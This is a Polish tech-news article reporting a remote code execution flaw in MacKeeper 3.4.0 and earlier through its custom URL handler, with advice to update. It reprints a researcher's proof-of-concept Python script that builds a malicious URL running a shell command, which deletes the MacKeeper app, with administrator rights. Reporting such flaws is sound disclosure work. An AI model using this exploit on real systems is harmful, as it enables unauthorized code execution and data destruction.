Jeśli Twój sprzęt od Apple chroni ukraiński antywirus MacKeeper w wersji 3.4.0 lub wcześniejszej, jesteś potencjalną ofiarą ataku nieautoryzowanego wykonania zdalnego kodu z uprawnieniami administratora. Na trop podatności wpadł badacz z firmy SecureMac, który przedstawił proof of concept:
import sys,base64
from Foundation import *
RUN_CMD = "rm -rf /Applications/MacKeeper.app;pkill -9 -a MacKeeper"
d = NSMutableData.data()
a = NSArchiver.alloc().initForWritingWithMutableData_(d)
a.encodeValueOfObjCType_at_("@",NSString.stringWithString_("NSTask"))
a.encodeValueOfObjCType_at_("@",NSDictionary.dictionaryWithObjectsAndKeys_(NSString.stringWithString_("/bin/sh"),"LAUNCH_PATH",NSArray.arrayWithObjects_(NSString.stringWithString_("-c"),NSString.stringWithString_(RUN_CMD),None),"ARGUMENTS",NSString.stringWithString_("Your computer has malware that needs to be removed."),"PROMPT",None))
print "com-zeobit-command:///i/ZBAppController/performActionWithHelperTask:arguments:/"+base64.b64encode(d)
MacKeeper jest tworem ukraińskiej firmy ZeoBIT. Zaprogramowano go w celu zwiększenia wydajności systemu oraz bezpieczeństwa komputerów Mac. Do tej pory udało mu się zyskać całkiem sporą publikę – podana informacja na stronie przez producenta pokazuje wyraźnie, że 20 milionów pobrań nie może być czymś przypadkowym. Niestety w sieci można znaleźć całkiem sporo negatywnych opinii o tym sofcie. Użytkownicy narzekają na wyskakujące okienka reklamowe, które wciskają dodatkowe programy producenta podkreślając konieczność oczyszczenia systemu ze zbędnych śmieci.
O co chodzi?
Luka została odkryta w mechanizmie walidacji adresów URL, które używane są podczas interakcji użytkownika z systemem OS X, iOS a zainstalowanymi programami. Zdefiniowanie własnych URL-i pozwoli przypisać np. kliknięciu myszą w adres e-mail otworzenie aplikacji Mail.app do napisania nowej wiadomości.
Przedstawiony dowód koncepcji umożliwia atakującemu ominięcie tego zabezpieczenia i wykonanie własnego kodu. Oczywiście, aby się to stało ofiara musi najpierw odwiedzić podstawioną stronę internetową, w wyniku czego napastnik może wykonać dowolny kod z uprawnieniami administratora, lub jak w przypadku proof of concept zmusić antywirusa MacKeeper do auto-deinstalacji.
Zalecamy aktualizację MacKeeper do wersji 3.4.1 lub późniejszej, albo też pozbycie się program na rzecz innego.
